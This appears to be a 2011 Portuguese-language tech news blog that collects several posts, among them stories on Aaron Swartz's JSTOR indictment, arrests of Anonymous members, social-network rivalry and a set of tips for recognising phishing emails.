Andrei, na área de desenvolvimento web no sentido de programação é possível, sim, trabalhar com Linux, pois ele possui ótimas ferramentas para isso. Porém, quanto ao design, suas ferramentas são mais limitadas que as de Windows. Além disso, para fins de testes de navegadores, você vai precisar de um computador ou máquina virtual com Windows para realizar testes no Internet Explorer.

Alguns softwares que você poderá utilizar são o Gimp, o Inkscape, o NVU e o Bluefish

Outra opção é utilizar alguma camada de compatibilidade do Linux com programas Windows, como o Wine e CrossOver. Mas atenção: essas camadas de compatibilidade conseguem inclusive executar alguns poucos vírus para Windows. Então se certifique de que os softwares que você vai executar estão limpos.

Apesar disso, para algumas áreas não existirá software para Linux com todas as funções que existe para Windows, e nem mesmo os aplicativos para Windows poderão ser executados com um desempenho aceitável.

A coluna Segurança Digital de hoje fica por aqui, mas não se esqueça de deixar sua dúvida sobre segurança, crime virtual, privacidade ou direito digital na área de comentários, porque toda quarta-feira tem pacotão aqui no site. Até a próxima!


Estudante é acusado de baixar mais de 5 mi de artigos acadêmicos

m aluno da universidade de Harvard, que estava estudando ética, foi acusado de invadir a rede de computadores do Instituto de Tecnologia de Massachusetts e roubar quase 5 milhões de artigos acadêmicos.
Aaron Swartz, 24, foi acusado de roubar documentos do Jstor, um serviço popular de pesquisa que oferece cópias digitalizadas de mais de mil jornais acadêmicos e documentos, alguns datados do século XVII.

Em uma acusação divulgada na última terça-feira (19), os promotores dizem que Swartz roubou 4,8 milhões de artigos de setembro de 2010 a janeiro, depois de invadir um computador que estava no campus do instituto. Swartz baixou tantos documentos durante um dia no mês de outubro que um dos servidores do Jstor não aguentou a carga, diz a acusação.

Os promotores dizem que Swartz pretendia distribuir os artigos em sites de compartilhamento de arquivos.

O estudante se entregou à polícia na terça-feira (19) e se declarou inocente às acusações como fraude, fraude relacionada a computadores e obtenção ilegal de informações de um computador protegido. Ele foi solto com o pagamento de uma fiança de US$ 100 mil e encara até 35 anos de prisão, se julgado como culpado.

"Roubar é roubar, seja com um computador, seja com um pé-de-cabra", disse o promotor norte-americano Carmen Ortiz. "É igualmente nocivo à vitima, não importa se você vende o que você roubou ou compartilha com outras pessoas."

Uma ligação ao advogado de Swartz não foi retornada imediatamente. Ele deve comparecer à Justiça novamente no dia 9 de setembro.

Um representante do Jstor disse na terça-feira (19) que Swartz concordou em devolver todos os artigos, para que a empresa possa garantir que eles não sejam distribuídos.

"Nós não somos donos desse conteúdo. Nós somos responsáveis pela administração deles e trabalhamos duro para descobrir o que estava acontecendo. Trabalhamos duro para conseguir esses dados de volta.", disse a representante da empresa, Heidi McGregor.

Swartz é um ativista on-line que fundou o site Demand Progress, que afirma que "trabalha para ter mudanças progressivas nas políticas."

O site descreve Swartz como o "autor de um grande número de artigos sobre uma variedade de tópicos, especialmente corrupção em grandes instituições, incluindo organizações sem fins lucrativos, a mídia, políticos e a opinião pública".

O diretor executivo do site, David Segal, disse que as acusações contra Swartz não fazem sentido. "É como colocar alguém na prisão por supostamente checar muitos livros de uma biblioteca", disse.

Um representante da universidade de Harvard disse que o acusdo foi colocado em uma licença de dez meses depois que a entidade descobriu a investigação.

Swartz tinha acesso legítimo ao Jstor por meio de seus estudos em Harvard, mas a companhia tem restrições para uso que previnem um número tão grande de downloads.

A organização sem fins lucrativos Jstor, fundada em 1995, permite que bibliotecas economizem espaço, tempo e trabalho ao armazenar digitalmente séculos de publicações acadêmicas. Sua assinatura anual pode custar a uma grande universidade algo como US$ 50 mil.

De acordo com a acusação, Swartz conectou um laptop ao sistema do MIT em setembro de 2010 e se registrou sob um nome fictício. Então, ele usou um software para "baixar rapidamente um grande volume de artigos do Jstor".

Nos meses seguintes, o MIT e a Jstor tentaram bloquar os recorrentes downloads, chegando a negar acesso ao Jstor a todos os usuários do MIT. Mas Swartz supostamente desviou das barreiras impostas.


População chinesa na internet atinge 485 milhões

Segundo pesquisa feita por uma divisão ligada ao governo local, a população on-line na China, que já era a maior do mundo, atingiu a marca de 485 milhões de usuários no final de junho --6,1% de crescimento em comparação ao final de 2010.

A pesquisa, anunciada pelo Centro de Informação de Internet da China, mostra um crescimento de 27,7 milhões de internautas desde dezembro --quase a população total da Malásia. Isso significa que mais de um terço da população chinesa, de 1,3 bilhão, está conectada.

O Weibo, serviço de mensagens semelhante ao Twitter, tinha até o final de junho mais de 195 milhões de usuários. No fim do ano passado, o site era utilizado por 63,11 milhões de pessoas.

A crescente força e influência da população on-line chinesa aumenta a preocupação do governo, já que a internet tem grande potencial para gerar revoltas populares. As autoridades reforçaram a vigilância on-line nos últimos anos.


Twitter muda seu layout

Como já havíamos falado, o Twitter está mudando, ficando com uma aparência mais limpa, para muitos, com uma pitadinha de Facebook, pois algumas pessoas receberam uma atualização do site onde permite ao usuário comentar no perfil de outro, tipo o que se pode fazer na WALL do Facebook.
Nessa parte, digamos assim, o usuário que acessar o perfil de outro, encontrará um campo de texto dizendo, “Tweet para @fulano”. Ao clicar ali, a pessoa que estiver usando o Twitter poderá mandar um “replie” ao “@fulano”.
Conforme informações desta quarta-feira do Jornal Wall Street, informa que o site foi avaliado em 7 bilhões de dólares e essa informação vem bem ao que disse Carolyn Penner, que falou das intenções de tornar a interação entre os usuários mais fácil e assim conseguir arrecadar mais algumas centenas de milhões de dólares.
Só no último mês de 2010, o microblog arrecadou 200 milhões de dólares em uma capitalização liderada pela gestora de fundos, onde havia avaliado a empresa em 3,7 bilhões de dólares. Em fevereiro deste ano, a venture capital Andreessen Horowitz, por meio de compras no mercado secundário, fez um aporte no valor de 80 milhões de dólares no Twitter, deixando assim o microblog ainda mais rico.
Com isso, o Twitter agora muda para tentar arrecadar ainda mais e tornar-se a cada dia, uma empresa mais sólida e lucrativa, sem claro, deixar de atender seus “consumidores” com qualidade.


Leia mais no Oficina da Net: Twitter muda seu layout

Insatisfação de 33% dos usuários do Facebook podem favorecer o Google+

O Facebook não está tão em alta quanto parece. De acordo com uma pesquisa realizada pela Fore See Results, a rede social de Mark Zuckerberg não está tendo um bom índice de aceitação, muitos usuários dizem estar insatisfeitos com ela.
Do total de entrevistados, apenas 66% dizem aprovar o Facebook. Quem fica feliz com isso é o Google+, que deverá ganhar uma boa parcela de usuários insatisfeitos com a rede social de Zuckerberg.
Dentre os sites inclusos na pesquisa nos Estados Unidos, o Facebook ficou em último lugar da preferência, sendo que Wikipedia e YouTube lideram a listagem. O autor da pesquisa, Larry Freed, descreveu o site como “pobre” e ainda disse que o site se beneficiou de um “monopólio de espécies” no mercado das redes sociais.
O Facebook ainda lidera o grande mercado de redes sociais, no entanto, de acordo com Freed, as coisas podem mudar se o site não conseguir melhorar a satisfação dos usuários. “Se a Google+ conseguir levar uma parte da sua base de usuários para o Google+, o Facebook poderia ter um concorrente sério que tem potencial para abocanhar sua participação no mercado de forma muito rápida”, escreveu o autor da pesquisa.

FBI detém mais 14 membros da Anonymous

A polícia federal norte-americana, o FBI, deteve 14 pessoas ligadas ao grupo de hackers Anonymous, acusados de terem atacado a página da PayPal na sequência do boicote desta empresa à organização Wikileaks, em Dezembro passado.
O grupo Anonymous é uma organização internacional de ciber-activistas, associados sem qualquer espécie de liderança concreta O grupo Anonymous é uma organização internacional de ciber-activistas, associados sem qualquer espécie de liderança concreta (Paul Hanna/Reuters)

Paralelamente, a polícia britânica e a holandesa detiveram uma e quatro pessoas, respectivamente, igualmente ligadas ao grupo Anonymous.

Os agentes do FBI coordenaram cerca de 40 operações de detenção em dez estados norte-americanos: Alabama, Arizona, Califórnia, Colorado, Flórida, Massachusetts, Nevada, Novo México, Ohio e Washington.

“Catorze pessoas foram detidas pelo FBI devido à alegada participação num ataque informático contra a PayPal [do grupo eBay], no quadro de uma operação reivindicada pela Anonymous", precisa o comunicado do FBI.

Os detidos, com idades compreendidas entre os 20 e os 42 anos, são acusados de ter participado “com ajuda de outras pessoas” em ataques de negação de serviço (saturando os servidores dos sites) contra a Web de pagamentos online PayPal em início de Dezembro de 2010, ou seja, imediatamente depois de a PayPal ter decidido boicotar o site Wikileaks de Julian Assange”.

Os EUA somam-se assim a outros países que já detiveram, nos últimos tempos, membros da Anonymous como Espanha e Turquia.

Os detidos poderão enfrentar uma pena máxima de dez anos de prisão e o pagamento de uma multa até 250 mil dólares caso sejam considerados culpados.

Estão acusados de vários delitos, incluindo “conspirar e danificar intencionalmente” os sistemas informáticos da PayPal entre os dias 6 e 10 de Dezembro de 2010, especifica a acusação dos delegados do ministério público do distrito norte da Califórnia, em San José.

Apenas se desconhece a identidade de um dos detidos. Todos os outros foram nomeados. São eles (segundo o “El País”): Christopher Wayne Cooper, de 23 anos e conhecido como Anthrophobic; Joshua John Covelli, de 26 anos (também conhecido por Absolem ou Toxic); Keith Wilson Downey, 26 anos; Mercedes Renee Haefer, de 20 anos (No e MMMM) e Donald Husband, de 29 anos e que se dava a conhecer por Ananon.

Completam a lista Vincent Charles Kershaw, de 27 anos (Trivette, Triv e Reaper); Ethan Miles, de 33; James Murphy, de 36; Daniel Sullivan e Christopher Quang, ambos de 22 anos; Tracy Ann Valenzuela, de 42 anos e Drew Alan Phillips, de 26 e que usava o nome virtual Drew010, bem como Jeffrey Puglisi, de 28 anos (Jeffer, Jefferp e Ji).

O grupo Anonymous é uma organização internacional de ciber-activistas, associados sem qualquer espécie de liderança concreta, que se manifesta a favor da livre circulação de informação pela Internet e a favor da transparência governamental, que não hesita em entrar em redes oficiais ou de empresas privadas.

No passado, o grupo Anonymous levou a cabo represálias contra as empresas e instituições que decidiram boicotar o portal de revelação de segredos Wikileaks, tal como o site da MasterCard e do VISA.

Mas as operações deste grupo não se limitaram, porém, à defesa de Julian Assange e do seu projecto. Recentemente, os Anonymous infiltraram-se nos servidores do departamento da polícia estatal do Arizona e publicaram informação pessoal de diversos agentes, como resposta a uma proposta dura de reformas na imigração.

segunda-feira, 18 de julho de 2011

"Hacktivistas" usam técnicas simples, mas preocupam autoridades e empresas

A multinacional de agricultura e biotecnologia Monsanto tornou-se a última vítima do ativismo hacker, quando, esta semana, dados de seus funcionários, como nomes e telefones, foram expostos pelo grupo Anonymous.
Na mesma quarta-feira (13/07), outro grupo – que se diz parte do Anonymous – revelou os e-mails de 90 mil militares americanos, a partir da invasão à rede da Bozz Allen Hamilton, empresa de segurança contratada pelas forças armadas do país.
Os ataques são os últimos de uma série iniciada ano passado, quando a célebre equipe atacou companhias que estavam dificultando as ações do WikiLeaks – portal dedicado a expor segredos governamentais. Embora empresas e ministérios venham tentando interromper as ofensivas, elas só tem aumentado – o que causa preocupação.
“Antes eu diria que são apenas algumas crianças – pixadores, talvez”, afirmou James Lewis, especialista em cibersegurança do Centro para Estudos Estratégicos e Internacionais. “No entanto, se não formos capazes de capturá-las, a situação ficará complicada”.
Leia também: Em ciberataque, invasores roubam 24 mil arquivos do Pentágono
Autoridades da União Europeia já expressaram receio quanto aos ataques. Temem que eles representem o ressurgimento de movimentos anárquicos, que podem expandir-se a muitas nações no continente, de acordo com Lewis.
Ainda assim, uma importante lição pode ser tirada dos últimos incidentes, já que as ofensivas só foram possíveis devido a falhas na segurança das redes. Embora algumas notícias sobre a complexidade das invasões tenham repercutido, a maioria das técnicas utilizadas é simples, como a busca por conteúdo desprotegido ou a inundação de servidores com pacotes de dados (DDos).
“Pelo nível dos golpes que temos observado, as pessoas não deveriam estar caindo neles”, disse Lewis. “Uma boa defesa seria o suficiente para identificá-los e bloqueá-los”.
Falhas da Sony, por exemplo – entre elas, senhas sem criptografia – permitiram que um ataque simples penetrasse a rede, diz. Além disso, o ataque contra a consultoria Booz Allen Hamilton também usou técnicas não muito sofisticadas.
Sim, às vezes os “hacktivistas” empregam algumas técnicas complexas. Por exemplo, estão aumentando o uso de botnets para mantê-los no anonimato e tornar os ataques mais difíceis de serem detidos.
“Acho que eles precisam ser levados a sério”, diz Clemens. “Se o conhecimento deles é alto ou não, não importa. Estão vencendo porque seus alvos não estão bem protegidos”, aponta.

Turquia prende 32 hackers do Anonymous por ataques contra o governo

Ações de negação de serviço disparadas contra sites oficiais foram realizadas em protesto contra a censura e o bloqueio da web no país.

Em uma resposta às ações do grupo de hackers Anonymous, a Turquia prendeu 32 pessoas após ataques em sites do governo, segundo a agência turca de notícias Anadolu.
De acordo com as informações, os supostos membros do grupo foram presos em 12 cidades, incluindo Ancara e Istambul.
Esse é o registro mais recente de prisões relacionadas ao Anonymous, uma organização descentralizada de ativistas que conduzem ataques de negação de serviço (DDOS) contra organizações e empresas às quais o grupo se opõe. O objetivo dos ataques é tirar os sites do ar.
Na sexta-feira (10/6), a Espanha afirmou que concluiu sua primeira ação policial contra o Anonymous, que resultou na prisão de três pessoas que teriam direcionado ataques DDOS em bancos, sites de governos e companhias, incluindo a Sony.
Neste mesmo dia, o Anonymous afirmou em seu site, Anon0ps Communications, que os ataques contra o governo turco foram em protesto contra "planos para implementar um filtro na navegação online" em agosto. Em março, ativistas foram às ruas em 30 cidades na Turquia para protestar contra os planos.
"Nos últimos anos, testemunhamos a censura adotada pelo governo turco, na forma de bloqueio de sites como YouTube, Rapidshare, Fileserve e milhares de outros", diz a declaração. "Recentemente, o governo bloqueou o acesso aos serviços Google. Esses atos de censura são indesculpáveis."
Segundo o Anonymous, os ataques foram executados utilizando o "Low Orbit Ion Cannon", uma ferramenta fácil de operar para ataques DDOS. Mas especialistas de segurança afirmaram que, para as autoridades,  não é difícil rastrear os usuários desta técnica.

Após ser banido do Google+, Anonymous decide criar sua própria rede social

Para hackers, "isso é o que acontece quando você caminha de acordo com uma batida diferente do tambor"; retaliação à Google também está prevista.

O grupo hacker Anonymous afirmou a criação de uma rede social própria, que não será "desligada, censurada ou oprimida".
Pela deciaração publicada em blog do Tumblr, a decisão parece ter sido motivada pela decisão da Google de banir o grupo de sua nova rede Google+.
Segundo aviso da Google recebido pelo grupo e também publicado no Tumblr, alguns dos posts do "Your Anon News" "violava nossos padrões para a comunidade".
Em blog no Tumblr, o grupo reconhece ter sido banido do Google+ por causa do conteúdo postado, mas ressalta que não sabia da extensão desse banimento.
"Isso é o que acontece na Internet quando você caminha de acordo com uma batida diferente do tambor", afirma o grupo, no blog.
"Nós todos já ouvimos histórias de ativistas sendo banidos do Facebook, Twitter, YouTube, e de governos que bloqueiam seus cidadão nesses sites (...). Esses dias vão chegar a um fim. Não apenas um grupo organizado de pessoas decidiu por uma operação contra o Google+, como nós começamos a construir nossa própria rede social."
"O tempo das ovelhas acabou. As Interwebz não são mais sua prisão", declarou o grupo.

sexta-feira, 15 de julho de 2011

Estudo mostra que sites de busca afetam a memória

Pesquisa realizada por cientistas americanos mostra que o acesso permanente à internet modificou a maneira como as pessoas armazenam informações na memória. O trabalho publicado na revista "Science" diz que ao saber que a informação está ali, disponível o tempo inteiro, as pessoas tendem a ser mais "preguiçosas" na hora de memorizá-las.

Cerca de 200 pessoas participaram do teste que definiu o resultado. Os participantes, todos universitários, memorizavam bem mais as informações quando acreditavam que não teriam mais acesso a elas.

Os pesquisadores repararam que ao se depararem com uma pergunta, os voluntários logo pensavam em em sites de busca, ao invés de tentar puxar pela própria memória a resposta certa.

O site Google foi o mais citado, eles concluíram que as pessoas estão apresentando uma tendência a guardar mais onde encontrar a informação do que o dado em si.

Segundo matéria publicado na "Folha de S. Paulo", a líder da pesquisa, Betsy Sparrow, que é professora da Universidade Columbia, enxerga as mudanças como positivas já que a memória estaria se adaptando à essa nova realidade. Para ela, a internet está funcionando como uma memória externa.

Em contra partida, na opinião do neurocientista da PUC-RS, Martín Cammarota, apesar da pesquisa ser bastante válida, ela exagera ao dizer que o Google e outros sites foram os responsáveis pelas mudanças. Já que, um grupo de controle que nunca tenha tido acesso com o buscador foi pesquisado. 



Opinião: 5 coisas que o Facebook deveria fazer para dar o troco no Google+

Selecionamos algumas coisas que a rede de Zuckerberg pode fazer para manter seu domínio, apesar do sucesso do novo site da Google.

À medida que a invasão do Google+ continua, o Facebook está sentindo o calor causado por seu novo rival. Apesar da rede social da Mark Zuckerberg possuir mais de 700 milhões de usuários, algumas pessoas estimam que o novo site da Google pode atingir a casa dos 20 milhões já neste final de semana. Isso significaria um crescimento de mais 1 milhão de novos usuários por dia desde o lançamento do serviço, quando Zuckerberg pareceu ir para o ataque, alertando o mundo que sua empresa iria, em troca, anunciar “algo impressionante”.
Na conferência de imprensa realizada na semana seguinte, o CEO do Facebook protestou (talvez um pouco demais)  dizendo que o seu site não estava preocupado com o incrível sucesso da rede social da Google. Mas os recursos anunciados naquele dia, incluindo a videochamada em parceria com o Skype e o chat em grupo, parecem claramente direcionados ao Google+. No entanto, essas novidades parecem não ter colocado fogo no mundo, como esperava Zuckerberg. O que o Facebook pode fazer para ganhar a multidão de volta?
O CEO do Facebook chamou a conferência de imprensa de “o início da temporada de anúncios", por isso o site com certeza ainda tem mais truques na manga para competir com o Google+. Mas que tipo de serviços o Facebook irá oferecer? E será que essas novas ferramentas realmente vão ajudar a manter o site no topo do mercado das redes sociais?
Segue abaixo uma lista de 5 coisas que o Facebook poderia fazer para competir com a força e possibilidades do Google+.
Faça novos Amigos
O Facebook certamente tem a vantagem agora quando o assunto é base de usuários, mas a companhia não pode apenas fingir que o Google+ vai seguir os passos dos antecessores Wave ou Orkut e morrer em silêncio.
Se as duas empresas se afastarem, os usuários frustrados por terem que se repetir e subir as mesmas fotos várias vezes vão acabar escolhendo a rede social mais nova em vez da velha e cansada. Como referência, é possível lembrar da batalha Facebook x MySpace entre 2004 e 2010 – com a diferença que dessa vez o Facebook está arriscado a cometer os erros do MySpace.
Em vez disso, o Facebook deveria deixar as diferença de lado e permitir que os usuários do Google+ importem seus amigos do Facebook. O site de Zuckerberg deve lidar com o Google+ da mesma maneira que lidou com o Twitter: permitindo que os usuários do Google+ compartilhem suas atualizações no Facebook e, em troca, abrir seu conteúdo para a rede da Google.
Imagine exportar seus amigos do Facebook para o Google+, organizá-los em Círculos menores e em um Círculo maior do “Facebook”, e então atualizar seu status no Google+ com a hashtag #fb (como o Twitter permite que você faça) para fazer com que o update apareça no seu feed de notícias do Facebook.
No final das contas, o Facebook iria facilitar um maior compartilhamento em seu site, ao receber atualizações do Google+ e do Twitter integradas em seu feed de notícias, o que ajuda na vida dos anúncios mais direcionados. E talvez com uma aliança mais “light” entre Facebook, Google+ e Twitter, os usuários possam construir redes sociais mais intrincadas – e nenhuma delas precisa morrer.
Construa um Ecossistema
O Facebook possui cerca de 700 milhões de usuários por uma razão: é funcional. Por mais que todo mundo goste de reclamar, o site tem muitos ótimos recursos – como o chat e eventos – que parecem difíceis de ficarem melhores em outro lugar. Mesmo assim, se o Facebook quiser sobreviver, precisa combinar diferentes recursos juntos de uma maneira que mantenha as pessoas no site.
Apesar de o Facebook ser uma ótima plataforma para muitas coisas, não é a parada obrigatória para serviços na web que o Google está se tornando rapidamente.  Lembre que o Facebook e a Google estão competindo para ser destinos da rede “always on”. O problema com a abordagem modular do Facebook é que me dá muitas razões para sair. Muitas vezes me pego navegando fora do Facebook para alguns serviços essenciais que o site não fornece, ou fechando a janela quando já fiz minhas coisas na página.
E o Facebook não está de olhos fechados para o problema. Na conferência de imprensa da última semana, Zuckerberg falou de uma visão para o futuro em que o Facebook faria parcerias com outros sites para levar o compartilhamento pela rede. Mesmo que você esteja no Hulu, por exemplo, ainda estaria compartilhando no Facebook.
Mas eu gostaria de ter mais compartilhamento no próprio Facebook. O site precisa pensar em seus serviços não como apps modulares, individuais, mas como serviços conectados, da mesma forma que a Google. Os recursos grupos, chat e eventos estão começando a ganhar um pouco de integração, mas a gigante das redes sociais ainda tem um longo caminho antes que um usuário possa, por exemplo, organizar, criar e compartilhar um evento apenas no Facebook.
Livre-se dos Apps
Quando o Facebook lançou sua plataforma de Apps há alguns anos, parecia algo legal no início. Você podia adicionar vários dispositivos ao seu perfil, como um quiz de política, ou um app em que seus amigos podiam desenhar imagens suas. Para mim, a curiosidade passou rápido, e – com algumas poucas exceções – os Apps tornaram-se mais um incômodo do que um benefício.
A plataforma Apps permitiu algumas funcionalidades legais e úteis. Por exemplo, é possível fazer login em outros serviços, como StumbleUpon, usando sua conta no Facebook. E a plataforma permite que o usuário faça upload de fotos do seu computador para o Facebook, com o iPhoto (para Mac) – sem precisar entrar no site do Facebook.
Mas os incômodos superam os benefícios da plataforma atualmente (e como serviços como Flickr e Twitter mostram, você não precisa de algo tão grande quanto o Facebook Apps para fazer integração com outros apps e sites possíveis). Meu feed do Facebook está lotado de mensagens de amigos sobre o FarmVille. A qualquer hora do dia, sempre tenho vários pedidos e convites de apps esperando por mim.
Acima de tudo, os Apps tiram um pouco do que tornou o Facebook uma alternativa atraente ao MySpace em primeiro lugar. Em seus primeiros anos, o Facebook era um site limpo e bem desenvolvido que tornava fácil se conectar com as pessoas que você conhecia. A chegada dos Apps foi um golpe bem significativo. E apesar de o Google+ ainda precisar de alguns ajustes, ele já faz um bom trabalho em conseguir fazer algo pelo qual o Facebook era conhecido.
Concorra com o “Círculos”
Se a principal inovação do Google+ (até agora) são os chamados Círculos, e a ideia de que seu gráfico social não se resuma ao binário “amigo” ou “não amigo”, então o Facebook poderia competir de forma bastante rápida. O site de Zuckerberg já tem um recurso de Listas, apesar de poucas pessoas usarem. Na interface Amigos, você pode clicar em Gerenciar Lista de Amigos, e começar a dividir seu gráfico social. Você pode até colocar amigos em mais de uma lista, assim como pode colocá-los em vários Círculos no Google+. Atualmente, as Listas são controladas apenas para controlar quem pode ver determinadas partes do seu perfil. Você também pode enviar mensagens para uma lista, mas há um limite de 20 recipientes por mensagem.
Realmente, tudo que o Facebook precisa fazer é tornar o recurso de Listas mais proeminente e onipresente. Se o Facebook permitisse que posts na mural, compartilhamento de vídeo e fotos, convites de eventos e todos os outros níveis de compartilhamento fossem enviados para listas específicas, a companhia conseguiria essencialmente reproduzir a funcionalidade do Círculos. Obviamente, o Facebook gostaria de incitar os usuários a colocarem seus amigos em uma lista cada sempre que adicionarem um amigo, e toda a interface do Listas precisa de ajustes, mas esses são problemas que pode resolver a curto prazo. A tecnologia básica – a parte difícil – já é parte da plataforma.
Diminua as notificações
Facebook, eu e você tivemos algo bom por um tempo. Ao contrário do MySpace, você não tinha muitas crianças de 13 anos, não permitia texto com “brilho” ou papéis de parede bizarros nos perfis, e você facilitou o processo de entrar em contato com as pessoas que conheço há muitos anos.
Então de repente o meu feed de notícias ficou cheio de coisas com as quais não me importo.
Eu realmente não quero saber toda vez que meus amigos viram amigos de alguém que eu não conheço. Apesar de podermos esconder alguns amigos e apps para limpar a bagunça, as opções para isso ainda são limitadas. Ou eu posso esconder um único post ou apagar completamente para que a pessoa não apareça mais no meu feed de notícias. Por que não apenas dar a opção de esconder as notificações quando alguém muda sua foto de perfil, ou quando entram ou saem de um relacionamento?
Atualmente o Facebook tem muita bagunça, mas não ouso “silenciar” nenhum amigo porque não quero tirá-los de meu radar social. Dê-nos mais controle para filtrar o que vemos em nosso feed de notícias, e talvez, apenas talvez, eu volte para “cutucar” alguém. Até lá, o Facebook acabou para mim. Estou mudando para o Google+, a nova rede social atraente do pedaço.

Wikileaks presta queixa formal contra MasterCard e Visa

Alegação é de violação da lei antitruste da União Europeia

O Wikileaks e a DataCell, empresa islandesa de TI, apresentaram, na última quinta-feira (14) uma queixa formal à Diretoria Geral de Competição da Comissão Europeia contra as companhias de cartão de crédito MasterCard e Visa Europe, alegando violação das leis antitruste em vigência na União Europeia.
O motivo, segundo a denúncia, seria o bloqueio de doações ao Wikileaks orquestradas pelas duas redes. Sozinha, a Visa Europe opera a maior rede de processamento de cartões de crédito e débito da União Europeia. Em dezembro de 2010 as duas operadoras impediram o Wikileaks de arrecadar doações através dos seus serviços, logo após Julian Assange, criador do site colaborativo, ameaçar expor informações confidenciais de grandes redes bancárias.
Na queixa, o Wikileaks alega que as empresas violaram preceitos descritos nos artigos 101 e 102 do Tratado da UE, ao efetuar o bloqueio de doações. De acordo com a DataCell, que mantém um acordo com o Wikileaks para coletar as doações por cartões de crédito, a postura da Visa e MasterCard vão de encontro às leis, uma vez que as mesmas abusaram da posição avantajada no mercado.
Se a denúncia for acatada pelo órgão regulador, o bloqueio financeiro das doações deve ceder.

Segurança: 5 dicas para você não ser vítima de golpes por email

Links anexos, arquivos que devem ser baixados e outra miríade de artifícios fazem parte do arsenal de cibercriminosos.


A técnica de tentar infectar uma máquina com base em emails contendo arquivos anexos ou tentando se passar por outra pessoa é quase milenar. Ainda assim, e possivelmente por força de sua permanência no meio digital, essas técnicas foram refinadas e passam a representar um perigo maior do que o de anos passados.
Segundo o departamento para emergências de informática dos EUA (US-Cert), os emails do tipo phishing foram responsáveis por 53% dos incidentes de segurança na América do Norte, em 2010.
Ocorre que os ataques via email da atualidade são feitos sob medida para atingir um determinado usuário dentro de uma organização específica. Depois da recente invasão e do furto de dados de clientes ocorrido nos servidores da Epsilon, especialistas sugerem a clientes de bancos que se preparem para uma onda de ataques baseadas nas informações obtidas no ataque.
Os dias em que phishers (quem envia os emails falsos) mandavam uma centena de emails iguais para várias caixas de entrada e com mensagens sem o mínimo de personalização ou lotadas de erros de grafia são – quase – página virada na história. Os criminosos digitais perceberam que com um pouco mais de trabalho e levantamento de informações sobre a vítima, é possível armar esquemas que passam confiança aos olhos do usuário menos experiente. Afinal de contas, infectar uma máquina é suficiente para comprometer a segurança de toda a rede corporativa.
Leia também: Golpes de phishing são mais eficazes entre usuários de smartphone
“Vemos cada vez mais cenários em que dois ou três emails são enviados contendo arquivos maliciosos”, avisa Jim Hansen, da empresa de segurança digital PhishMe.
Com o objetivo de oferecer aos usuários uma forma de se defenderam desse tipo de ataque, a PhishMe desenvolveu um treinamento que visa mudar o comportamento das pessoas em casos de eventuais ataques via phishing email.
Veja quais são as dicas:
Ceticismo é bom
Tenha sempre prontas as perguntas: de quem veio esse email? “Casos seja alguém desconhecido, as chances de ser uma mensagem absolutamente inútil/maléfica são grandes”, adverte Hansen. Sempre vale a pena investigar o domínio de envio do email no Google antes de prosseguir na abertura da mensagem. O domínio é toda a parte que fica do lado direito da @. Exemplo: atendimento@dominio22997765.com.br

“Sei que somos, todos nós, pessoas bastante ocupadas, mas não custa prestar atenção na hora de verificar seus emails”, completa.
Com anexos, todo cuidado é pouco
“Se, ao abrir um email, você for orientado a fazer o download de arquivos – sejam estes de qual natureza forem – não o faça”, adverte Hansen. Para ele, na melhor das hipóteses, o usuário receberá uma dúzia de mensagens irrelevantes, poucas horas depois de abrir os anexos. “Já na pior”, continua Hansen, “você estará abrindo o seu computador para um hacker”.

Não interessa se a mensagem for enviada por alguém desconhecido ou alguém que você conheça bem – confirmar com a pessoa o envio, antes de abrir, o anexo, é fundamental.
Ignore instruções – sejam estas quais forem
“Cada vez que uma mensagem instrui um usuário a realizar uma ação, vale a pena dobrar o cuidado com essa mensagem”, diz Hansen. Para o consultor, se uma coisa parece boa demais para ser verdade, é mentira.

“Normalmente, o criminoso apela para uma tática baseada em dois princípios: recompensa ou autoridade”, diz.
Nos golpes em que o hacker tenta se passar por uma autoridade, ele irá tentar persuadir o usuário a tomar alguma medida em nome de um órgão ou departamento de Estado ou da própria empresa. A mensagem pode dizer que seu computador está infectado, e que você deve clicar imediatamente em um link para executar a desinfecção automática do computador. Em outra modalidade, na mesma linha, a mensagem diz ser do RH e pede que você complete um formulário online. Existem, ainda, os casos em que quem envia a mensagem afirma ser de seu banco e que sua conta corrente fora invadida, em seguida irá pedir para o usuário confirmar seus dados, incluindo a senha.
Nos casos em que são oferecidas recompensas, existe uma miríade de golpes. Desde prêmios em dinheiro, a iPads – todas vão requerer que o usuário complete algum formulário obscuro.
“Não dê atenção a essas tentativas”, adverte Hansen.
Verifique o link
Para onde aponta o link da mensagem? “Quase todas as mensagens malintencionadas apresentam um link em que o usuário é persuadido a clicar”, diz Hansen. Apesar de teoricamente esse link apontar para sua conta no Facebook ou sua conta bancária, o destino desse atalho pode ser bem menos relevante que isso.

A maneira mais fácil de descobrir a autenticidade do atalho é encostar com o mouse em cima do link e observar, no rodapé da janela de navegação ou do cliente de email, para onde esse link realmente aponta.
Possivelmente, o atalho exibido mostre um número IP, como 192.168.1.1 – já é um bom indicativo de que você não vai gostar do que se esconde atrás desse atalho.
Ainda: com a popularização de encurtadores de URL como o bit.ly, ficou quase impossível descobrir o real destino do link na mensagem. Existe, porém, uma maneira de verificar o destino do atalho: Copie o link encurtado, que deverá se parecer com bit.ly/ju897897hyt e cole-o na barra de endereços do navegador, adicionando um sinal de adição ao seu final. O resultado final será bit.ly/ju897897hyt+. Ao pressionar enter depois de inserir esse atalho, o usuário é levado até a página do encurtador, onde poderá verificar o destino do link, sem correr qualquer risco. Nessa página, também verá quantas vezes o link foi clicado desde sua criação. Saiba que se for, de fato, um atalho para uma página de banco ou sua página do Facebook, o número de cliques deverá ser zero.
Lembre-se do telefone
Faz tempo que não usa seu telefone para sua finalidade original, não faz? Bem, para muitos de nós, esse método arcaico de comunicação remete aos tempos da inquisição. Mesmo assim, tem sua utilidade nos dias de hoje.

Hansen sugere: “se você desconfia da autenticidade da mensagem e, ainda assim, ela urge que você tome uma atitude, passe a mão no telefone e ligue para a pessoa que – em tese – lhe enviou essa mensagem. Sim, se preferir pode mandar uma mensagem texto pelo telefone”.

O que podemos aprender com a nova onda de ataques phishing

Contas dos principais serviços foram invadidas por crackers que, segundo a Google, agiram a partir da China. Veja como não ser mais uma das vítimas.

Quando se ouve falar de um ataque phishing que vitimou inúmeras contas de e-mail, é costume pensar que os usuários que caíram no golpe foram ingênuos. No entanto, as ofensivas recentes contra os serviços Hotmail, Gmail e Yahoo Mail demonstraram que a velha recomendação de não abrir anexos de remetentes desconhecidos nem sempre é o bastante para manter- seu equipamento em segurança.
A companhia de segurança Trend Micro chegou inclusive a estudar os incidentes para entender como eles se deram. Eis algumas dicas para não ser atingido por uma nova onda de armadilhas virtuais.
Amigo da onça
